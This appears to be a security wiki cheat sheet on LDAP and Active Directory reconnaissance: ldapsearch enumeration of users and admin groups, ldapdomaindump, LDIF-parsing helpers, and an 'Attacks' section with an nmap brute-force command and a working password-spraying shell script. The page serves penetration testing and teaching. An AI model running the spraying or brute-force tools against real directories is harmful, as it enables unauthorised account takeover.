Ldap all: differences between versions
From InformationSecurity WIKI
Drakylar (talk | contribs) m (→ldapsearch)
Revision as of 13:42, 28 April 2020
Working with LDAP
Discovery
Port scan
Nmap
389/636 are LDAP and LDAPS; 3268/3269 are the Active Directory global catalog (plain and TLS).
nmap -p 389,636,3268,3269 -sV target -v
Gathering information
LDAP structure
Nmap
Pulls everything the root DSE exposes to an anonymous client, including the naming contexts (the DC=... domain entry and CN=Configuration,... / CN=Schema,... entries) that you then use as base DNs for further searches.
nmap -p 389,636 --script ldap-rootdse target -vv
Reading LDAP
Used once the structure (the base DN) is known.
ldapsearch
Simple variant (anonymous bind; -D '' -w '' just makes the anonymous bind explicit). -h/-p are the legacy host and port options; newer OpenLDAP clients prefer -H ldap://host:port.
ldapsearch -x -b "dc=company,dc=com" -s base -h <host>

ldapsearch -x -h target -D '' -w '' -b "dc=company,dc=com"
With SSL (LDAPS)
LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s sub
LDAPTLS_REQCERT=never disables verification of the server certificate, so the session can be intercepted; use it only when the directory's CA cannot be trusted on the client. -W prompts for the password instead of leaving it in the shell history.
Search
-s selects the scope: base (the base DN entry only), one (its direct children), sub (the whole subtree). "objectClass=*" matches every entry.
ldapsearch -x -p 389 -h "127.0.0.1" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"

ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*"
The Active Directory searches below bind with domain credentials. DC=<1_SUBDOMAIN>,DC=<TLD> is the DNS domain name split into labels (corp.local becomes DC=corp,DC=local). Without a filter ldapsearch returns every entry under the base DN.
List of users (the default CN=Users container; accounts moved into other OUs are not returned, search from the domain root with a filter for those)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Computers (the default CN=Computers container)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
Information about yourself
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Domain Admins (the group object; its member attribute lists the members)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Domain Users (most accounts belong to it through primaryGroupID rather than the member attribute, so member is usually near-empty)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Enterprise Admins (exists only in the forest root domain)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Built-in Administrators
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
RDP group (Remote Desktop Users)
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
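Two things bite when the output of these searches is processed further: ldapsearch folds long lines (a continuation line starts with a space) and base64-encodes any value that is not plain ASCII, which covers Cyrillic display names and binary attributes such as objectSid, printed as "attr:: <base64>". The script below is an added example, not part of the wiki page, and shows the helpers a practitioner ends up writing: building the base DN from the DNS name, unfolding and decoding LDIF, pulling one attribute out, converting a binary SID to S-1-5-... form, and a group-member query that searches from the domain root with a filter instead of assuming the group still lives in CN=Users. It assumes a POSIX shell, awk, sed, od and GNU coreutils base64; ldapsearch is needed only by ad_group_members, which talks to a real DC and is not run here. The sample LDIF is constructed for the demo, not captured from a directory.

```shell
#!/bin/sh
# Added example, not from the wiki. Assumes a POSIX shell, awk, sed, od and
# GNU coreutils base64 (for "base64 -d"); ldapsearch from the OpenLDAP client
# tools is needed only by ad_group_members.

# Build an AD base DN from a DNS domain name:
#   corp.example.com -> DC=corp,DC=example,DC=com
dn_from_domain() {
  printf 'DC=%s\n' "$1" | sed 's/\./,DC=/g'
}

# Normalise LDIF as ldapsearch prints it: join folded continuation lines (a line
# starting with a space continues the previous one) and decode "attr:: <base64>"
# values. ldapsearch base64-encodes any value that is not safe ASCII, so
# non-ASCII names (a Cyrillic displayName, say) and binary attributes arrive
# this way. objectSid and objectGUID are emitted as hex rather than raw bytes.
unfold_ldif() {
  awk '
    /^ / { buf = buf substr($0, 2); next }      # continuation line
    { if (seen) print buf; buf = $0; seen = 1 }
    END { if (seen) print buf }
  ' | while IFS= read -r line; do
    case $line in
      [A-Za-z]*'::'*)
        attr=${line%%::*}
        b64=${line#*:: }
        case $attr in
          *[!A-Za-z0-9.-]*)       # "::" inside a plain value, not an encoded attribute
            printf '%s\n' "$line" ;;
          objectSid|objectGUID)
            printf '%s: %s\n' "$attr" \
              "$(printf '%s' "$b64" | base64 -d | od -An -tx1 | tr -d ' \n')" ;;
          *)
            printf '%s: %s\n' "$attr" "$(printf '%s' "$b64" | base64 -d)" ;;
        esac ;;
      *)
        printf '%s\n' "$line" ;;
    esac
  done
}

# Print every value of one attribute from unfolded LDIF on stdin.
ldif_attr() {
  awk -v a="$1" 'index($0, a ": ") == 1 { print substr($0, length(a) + 3) }'
}

# Decode a hex-encoded binary SID (as produced by unfold_ldif) to S-1-5-... form:
# byte 0 revision, byte 1 sub-authority count, bytes 2-7 identifier authority
# (big-endian), then 32-bit little-endian sub-authorities.
sid_to_string() {
  hex=$1
  rev=$((0x$(printf %s "$hex" | cut -c1-2)))
  count=$((0x$(printf %s "$hex" | cut -c3-4)))
  auth=$((0x$(printf %s "$hex" | cut -c5-16)))
  out="S-$rev-$auth"
  i=0
  while [ "$i" -lt "$count" ]; do
    off=$((17 + i * 8))             # 1-based index of this sub-authority's first hex digit
    # little-endian: reverse the four byte pairs before parsing
    le=$(printf %s "$hex" | cut -c"$off-$((off + 7))" | sed 's/\(..\)\(..\)\(..\)\(..\)/\4\3\2\1/')
    out="$out-$((0x$le))"
    i=$((i + 1))
  done
  printf '%s\n' "$out"
}

# Members of an AD group, searched from the domain root with a filter instead of
# a hard-coded CN=Users container (groups are often moved into OUs).
# Needs network access to a DC; not exercised offline.
# Usage: ad_group_members <dc-ip> '<DOMAIN>\<user>' '<password>' corp.example.com 'Domain Admins'
ad_group_members() {
  ldapsearch -x -LLL -H "ldap://$1" -D "$2" -w "$3" \
    -b "$(dn_from_domain "$4")" "(&(objectClass=group)(cn=$5))" member \
    | unfold_ldif | ldif_attr member
}

# Constructed sample (not captured from a real directory), shaped like
# "ldapsearch -LLL" output for a group: a base64 Cyrillic displayName ("Админ"),
# a folded member DN, and a base64 objectSid.
SAMPLE_LDIF='dn: CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com
cn: Domain Admins
displayName:: 0JDQtNC80LjQvQ==
member: CN=Administrator,CN=Users,DC=corp,DC=example,DC=com
member: CN=Very Long Name That Gets Folded By The Server,OU=Staff,DC=corp,DC
 =example,DC=com
objectSid:: AQUAAAAAAAUVAAAAAQIDBAUGBwgJCgsM9AEAAA=='

# Stand-alone demo on the constructed sample.
demo() {
  dn_from_domain corp.example.com
  printf '%s\n' "$SAMPLE_LDIF" | unfold_ldif
  sid_to_string "$(printf '%s\n' "$SAMPLE_LDIF" | unfold_ldif | ldif_attr objectSid)"
}
```

Run `demo` to see the unfolded entry; the decoded SID of the sample is S-1-5-21-67305985-134678021-202050057-500, i.e. RID 500, the built-in Administrator, which is the kind of thing worth spotting in a members list.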
ldapdomaindump
Dumps users, groups, computers, trusts and the password policy of a domain into HTML, JSON and grep-friendly text files; authenticate with -u '<DOMAIN>\<username>' -p '<password>'.
usage: ldapdomaindump [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
                      [-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
                      [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
                      [-m]
                      HOSTNAME
Editing LDAP
ldapmodify
-a adds the entries from the LDIF file (the same as ldapadd); the bind DN must have write access.
ldapmodify -a -h "127.0.0.1" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldif
modify.ldif:
dn: ou=people,dc=company,dc=com
objectClass: top
objectClass: organizationalunit
ou: people
...
ldapdelete
ldapdelete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com"
Attacks
Brute force
Nmap
nmap -p 389,636 --script ldap-brute --script-args ldap.base='"cn=schema,dc=targetbox,dc=target"' target -vv
Against Active Directory check the lockout policy first: pushing one account past lockoutThreshold locks it out, which is noisy and hurts the target. The policy is readable on the domain object: ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" -s base lockoutThreshold lockoutObservationWindow lockoutDuration
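The lockout problem is why, against a domain, one password is tried across all users per round (password spraying) rather than many passwords against one account. The script below is an added example, not from the wiki, that does this over LDAP simple bind with ldapwhoami from the OpenLDAP client tools; the host, file names and credentials are placeholders, and the number of rounds and the pause between them are meant to be set from the lockoutThreshold and lockoutObservationWindow values read from the domain. try_bind is a separate function so that it can be replaced with a dry-run stub.

```shell
#!/bin/sh
# Added example, not from the wiki. Assumes a POSIX shell and, for real use,
# ldapwhoami from the OpenLDAP client tools. Host, file names and credentials
# are placeholders.

# One simple-bind attempt; returns 0 on success. ldapwhoami exits non-zero
# (49, invalidCredentials) on a bad password. Redefine this function to dry-run.
try_bind() {
  ldapwhoami -x -H "ldap://$1" -D "$2" -w "$3" </dev/null >/dev/null 2>&1
}

# Password spraying: one password against every user per round, so each account
# sees a single failed bind per round. Stops after max_rounds rounds (keep it
# below the domain lockoutThreshold) and sleeps delay seconds between rounds
# (longer than lockoutObservationWindow if the counter must reset in between).
# Args: host users_file passwords_file max_rounds delay_seconds
# Users are bind DNs or '<DOMAIN>\<username>' strings, one per line.
# Prints "user:password" for each successful bind; returns 0 if any succeeded.
ldap_spray() {
  host=$1 users=$2 passwords=$3 max_rounds=$4 delay=$5
  found=1
  round=0
  while IFS= read -r pass; do
    [ -n "$pass" ] || continue
    round=$((round + 1))
    [ "$round" -le "$max_rounds" ] || break
    while IFS= read -r user; do
      [ -n "$user" ] || continue
      if try_bind "$host" "$user" "$pass"; then
        printf '%s:%s\n' "$user" "$pass"
        found=0
      fi
    done < "$users"
    if [ "$round" -lt "$max_rounds" ]; then
      sleep "$delay"
    fi
  done < "$passwords"
  return $found
}

# Typical invocation (placeholders): two rounds, 31 minutes apart, which is
# safe for the Windows default of lockoutThreshold 0 (off) or 5 with a 30 minute
# lockoutObservationWindow. Not run here.
#   ldap_spray 10.0.0.1 users.txt passwords.txt 2 1860
```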